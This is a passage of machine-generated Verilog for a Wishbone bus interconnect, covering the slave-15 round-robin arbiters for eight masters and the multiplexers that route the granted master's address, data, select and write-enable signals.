                                        if ( s15_msel_arb2_req[2] ) 
                                        begin
                                            s15_msel_arb2_next_state = s15_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb2_grant4:
        begin
            if (  !( s15_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s15_msel_arb2_req[5] ) 
                begin
                    s15_msel_arb2_next_state = s15_msel_arb2_grant5;
                end
                else
                begin 
                    if ( s15_msel_arb2_req[6] ) 
                    begin
                        s15_msel_arb2_next_state = s15_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s15_msel_arb2_req[7] ) 
                        begin
                            s15_msel_arb2_next_state = s15_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s15_msel_arb2_req[0] ) 
                            begin
                                s15_msel_arb2_next_state = s15_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s15_msel_arb2_req[1] ) 
                                begin
                                    s15_msel_arb2_next_state = s15_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb2_req[2] ) 
                                    begin
                                        s15_msel_arb2_next_state = s15_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb2_req[3] ) 
                                        begin
                                            s15_msel_arb2_next_state = s15_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb2_grant5:
        begin
            if (  !( s15_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s15_msel_arb2_req[6] ) 
                begin
                    s15_msel_arb2_next_state = s15_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s15_msel_arb2_req[7] ) 
                    begin
                        s15_msel_arb2_next_state = s15_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s15_msel_arb2_req[0] ) 
                        begin
                            s15_msel_arb2_next_state = s15_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s15_msel_arb2_req[1] ) 
                            begin
                                s15_msel_arb2_next_state = s15_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s15_msel_arb2_req[2] ) 
                                begin
                                    s15_msel_arb2_next_state = s15_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb2_req[3] ) 
                                    begin
                                        s15_msel_arb2_next_state = s15_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb2_req[4] ) 
                                        begin
                                            s15_msel_arb2_next_state = s15_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb2_grant6:
        begin
            if (  !( s15_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s15_msel_arb2_req[7] ) 
                begin
                    s15_msel_arb2_next_state = s15_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s15_msel_arb2_req[0] ) 
                    begin
                        s15_msel_arb2_next_state = s15_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s15_msel_arb2_req[1] ) 
                        begin
                            s15_msel_arb2_next_state = s15_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s15_msel_arb2_req[2] ) 
                            begin
                                s15_msel_arb2_next_state = s15_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s15_msel_arb2_req[3] ) 
                                begin
                                    s15_msel_arb2_next_state = s15_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb2_req[4] ) 
                                    begin
                                        s15_msel_arb2_next_state = s15_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb2_req[5] ) 
                                        begin
                                            s15_msel_arb2_next_state = s15_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb2_grant7:
        begin
            if (  !( s15_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s15_msel_arb2_req[0] ) 
                begin
                    s15_msel_arb2_next_state = s15_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s15_msel_arb2_req[1] ) 
                    begin
                        s15_msel_arb2_next_state = s15_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s15_msel_arb2_req[2] ) 
                        begin
                            s15_msel_arb2_next_state = s15_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s15_msel_arb2_req[3] ) 
                            begin
                                s15_msel_arb2_next_state = s15_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s15_msel_arb2_req[4] ) 
                                begin
                                    s15_msel_arb2_next_state = s15_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb2_req[5] ) 
                                    begin
                                        s15_msel_arb2_next_state = s15_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb2_req[6] ) 
                                        begin
                                            s15_msel_arb2_next_state = s15_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s15_msel_arb3_req = { ( s15_msel_req[7] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'd3 ) ), ( s15_msel_req[6] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'd3 ) ), ( s15_msel_req[5] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'd3 ) ), ( s15_msel_req[4] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'd3 ) ), ( s15_msel_req[3] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'd3 ) ), ( s15_msel_req[2] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'd3 ) ), ( s15_msel_req[1] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'd3 ) ), ( s15_msel_req[0] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s15_msel_arb3_state <= s15_msel_arb3_grant0;
        end
        else
        begin 
            s15_msel_arb3_state <= s15_msel_arb3_next_state;
        end
    end
    always @ (  s15_msel_arb3_state or  { ( s15_msel_req[7] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[15] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[14] ) ) } == 2'd3 ) ), ( s15_msel_req[6] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[13] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[12] ) ) } == 2'd3 ) ), ( s15_msel_req[5] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[11] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[10] ) ) } == 2'd3 ) ), ( s15_msel_req[4] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[9] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[8] ) ) } == 2'd3 ) ), ( s15_msel_req[3] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[7] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[6] ) ) } == 2'd3 ) ), ( s15_msel_req[2] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'd3 ) ), ( s15_msel_req[1] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'd3 ) ), ( s15_msel_req[0] & ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s15_msel_arb3_next_state = s15_msel_arb3_state;
        case ( s15_msel_arb3_state ) 
        s15_msel_arb3_grant0:
        begin
            if (  !( s15_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s15_msel_arb3_req[1] ) 
                begin
                    s15_msel_arb3_next_state = s15_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s15_msel_arb3_req[2] ) 
                    begin
                        s15_msel_arb3_next_state = s15_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s15_msel_arb3_req[3] ) 
                        begin
                            s15_msel_arb3_next_state = s15_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s15_msel_arb3_req[4] ) 
                            begin
                                s15_msel_arb3_next_state = s15_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s15_msel_arb3_req[5] ) 
                                begin
                                    s15_msel_arb3_next_state = s15_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb3_req[6] ) 
                                    begin
                                        s15_msel_arb3_next_state = s15_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb3_req[7] ) 
                                        begin
                                            s15_msel_arb3_next_state = s15_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb3_grant1:
        begin
            if (  !( s15_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s15_msel_arb3_req[2] ) 
                begin
                    s15_msel_arb3_next_state = s15_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s15_msel_arb3_req[3] ) 
                    begin
                        s15_msel_arb3_next_state = s15_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s15_msel_arb3_req[4] ) 
                        begin
                            s15_msel_arb3_next_state = s15_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s15_msel_arb3_req[5] ) 
                            begin
                                s15_msel_arb3_next_state = s15_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s15_msel_arb3_req[6] ) 
                                begin
                                    s15_msel_arb3_next_state = s15_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb3_req[7] ) 
                                    begin
                                        s15_msel_arb3_next_state = s15_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb3_req[0] ) 
                                        begin
                                            s15_msel_arb3_next_state = s15_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb3_grant2:
        begin
            if (  !( s15_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s15_msel_arb3_req[3] ) 
                begin
                    s15_msel_arb3_next_state = s15_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s15_msel_arb3_req[4] ) 
                    begin
                        s15_msel_arb3_next_state = s15_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s15_msel_arb3_req[5] ) 
                        begin
                            s15_msel_arb3_next_state = s15_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s15_msel_arb3_req[6] ) 
                            begin
                                s15_msel_arb3_next_state = s15_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s15_msel_arb3_req[7] ) 
                                begin
                                    s15_msel_arb3_next_state = s15_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb3_req[0] ) 
                                    begin
                                        s15_msel_arb3_next_state = s15_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb3_req[1] ) 
                                        begin
                                            s15_msel_arb3_next_state = s15_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb3_grant3:
        begin
            if (  !( s15_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s15_msel_arb3_req[4] ) 
                begin
                    s15_msel_arb3_next_state = s15_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s15_msel_arb3_req[5] ) 
                    begin
                        s15_msel_arb3_next_state = s15_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s15_msel_arb3_req[6] ) 
                        begin
                            s15_msel_arb3_next_state = s15_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s15_msel_arb3_req[7] ) 
                            begin
                                s15_msel_arb3_next_state = s15_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s15_msel_arb3_req[0] ) 
                                begin
                                    s15_msel_arb3_next_state = s15_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb3_req[1] ) 
                                    begin
                                        s15_msel_arb3_next_state = s15_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb3_req[2] ) 
                                        begin
                                            s15_msel_arb3_next_state = s15_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb3_grant4:
        begin
            if (  !( s15_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s15_msel_arb3_req[5] ) 
                begin
                    s15_msel_arb3_next_state = s15_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s15_msel_arb3_req[6] ) 
                    begin
                        s15_msel_arb3_next_state = s15_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s15_msel_arb3_req[7] ) 
                        begin
                            s15_msel_arb3_next_state = s15_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s15_msel_arb3_req[0] ) 
                            begin
                                s15_msel_arb3_next_state = s15_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s15_msel_arb3_req[1] ) 
                                begin
                                    s15_msel_arb3_next_state = s15_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb3_req[2] ) 
                                    begin
                                        s15_msel_arb3_next_state = s15_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb3_req[3] ) 
                                        begin
                                            s15_msel_arb3_next_state = s15_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb3_grant5:
        begin
            if (  !( s15_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s15_msel_arb3_req[6] ) 
                begin
                    s15_msel_arb3_next_state = s15_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s15_msel_arb3_req[7] ) 
                    begin
                        s15_msel_arb3_next_state = s15_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s15_msel_arb3_req[0] ) 
                        begin
                            s15_msel_arb3_next_state = s15_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s15_msel_arb3_req[1] ) 
                            begin
                                s15_msel_arb3_next_state = s15_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s15_msel_arb3_req[2] ) 
                                begin
                                    s15_msel_arb3_next_state = s15_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb3_req[3] ) 
                                    begin
                                        s15_msel_arb3_next_state = s15_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb3_req[4] ) 
                                        begin
                                            s15_msel_arb3_next_state = s15_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb3_grant6:
        begin
            if (  !( s15_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s15_msel_arb3_req[7] ) 
                begin
                    s15_msel_arb3_next_state = s15_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s15_msel_arb3_req[0] ) 
                    begin
                        s15_msel_arb3_next_state = s15_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s15_msel_arb3_req[1] ) 
                        begin
                            s15_msel_arb3_next_state = s15_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s15_msel_arb3_req[2] ) 
                            begin
                                s15_msel_arb3_next_state = s15_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s15_msel_arb3_req[3] ) 
                                begin
                                    s15_msel_arb3_next_state = s15_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb3_req[4] ) 
                                    begin
                                        s15_msel_arb3_next_state = s15_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb3_req[5] ) 
                                        begin
                                            s15_msel_arb3_next_state = s15_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_msel_arb3_grant7:
        begin
            if (  !( s15_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s15_msel_arb3_req[0] ) 
                begin
                    s15_msel_arb3_next_state = s15_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s15_msel_arb3_req[1] ) 
                    begin
                        s15_msel_arb3_next_state = s15_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s15_msel_arb3_req[2] ) 
                        begin
                            s15_msel_arb3_next_state = s15_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s15_msel_arb3_req[3] ) 
                            begin
                                s15_msel_arb3_next_state = s15_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s15_msel_arb3_req[4] ) 
                                begin
                                    s15_msel_arb3_next_state = s15_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s15_msel_arb3_req[5] ) 
                                    begin
                                        s15_msel_arb3_next_state = s15_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s15_msel_arb3_req[6] ) 
                                        begin
                                            s15_msel_arb3_next_state = s15_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s15_msel_pri_out or  s15_msel_arb0_state or  s15_msel_arb1_state)
    begin
        if ( s15_msel_pri_out[0] ) 
        begin
            s15_msel_sel1 = s15_msel_arb1_state;
        end
        else
        begin 
            s15_msel_sel1 = s15_msel_arb0_state;
        end
    end
    always @ (  s15_msel_pri_out or  s15_msel_arb0_state or  s15_msel_arb1_state or  s15_msel_arb2_state or  s15_msel_arb3_state)
    begin
        case ( s15_msel_pri_out ) 
        2'd0:
        begin
            s15_msel_sel2 = s15_msel_arb0_state;
        end
        2'd1:
        begin
            s15_msel_sel2 = s15_msel_arb1_state;
        end
        2'd2:
        begin
            s15_msel_sel2 = s15_msel_arb2_state;
        end
        2'd3:
        begin
            s15_msel_sel2 = s15_msel_arb3_state;
        end
        endcase
    end
    assign s15_mast_sel = ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s15_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s15_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s15_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s15_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s15_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s15_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s15_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s15_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s15_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s15_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s15_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s15_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s15_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s15_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s15_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s15_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s15_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s15_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s15_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s15_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s15_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s15_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s15_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s15_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s15_m0_data_o = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( { { ( rf_aw - 16 ) { 1'b0 }} , rf_rf_dout } ) : ( s15_data_i ) );
    assign s15_m1_data_o = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( { { ( rf_aw - 16 ) { 1'b0 }} , rf_rf_dout } ) : ( s15_data_i ) );
    assign s15_m2_data_o = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( { { ( rf_aw - 16 ) { 1'b0 }} , rf_rf_dout } ) : ( s15_data_i ) );
    assign s15_m3_data_o = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( { { ( rf_aw - 16 ) { 1'b0 }} , rf_rf_dout } ) : ( s15_data_i ) );
    assign s15_m4_data_o = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( { { ( rf_aw - 16 ) { 1'b0 }} , rf_rf_dout } ) : ( s15_data_i ) );
    assign s15_m5_data_o = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( { { ( rf_aw - 16 ) { 1'b0 }} , rf_rf_dout } ) : ( s15_data_i ) );
    assign s15_m6_data_o = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( { { ( rf_aw - 16 ) { 1'b0 }} , rf_rf_dout } ) : ( s15_data_i ) );
    assign s15_m7_data_o = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( { { ( rf_aw - 16 ) { 1'b0 }} , rf_rf_dout } ) : ( s15_data_i ) );
    always @ (  ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s15_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s15_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s15_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s15_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s15_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s15_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s15_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s15_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s15_m0_cyc_r <= m0_s15_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s15_m1_cyc_r <= m1_s15_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s15_m2_cyc_r <= m2_s15_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s15_m3_cyc_r <= m3_s15_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s15_m4_cyc_r <= m4_s15_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s15_m5_cyc_r <= m5_s15_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s15_m6_cyc_r <= m6_s15_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s15_m7_cyc_r <= m7_s15_cyc_o;
    end
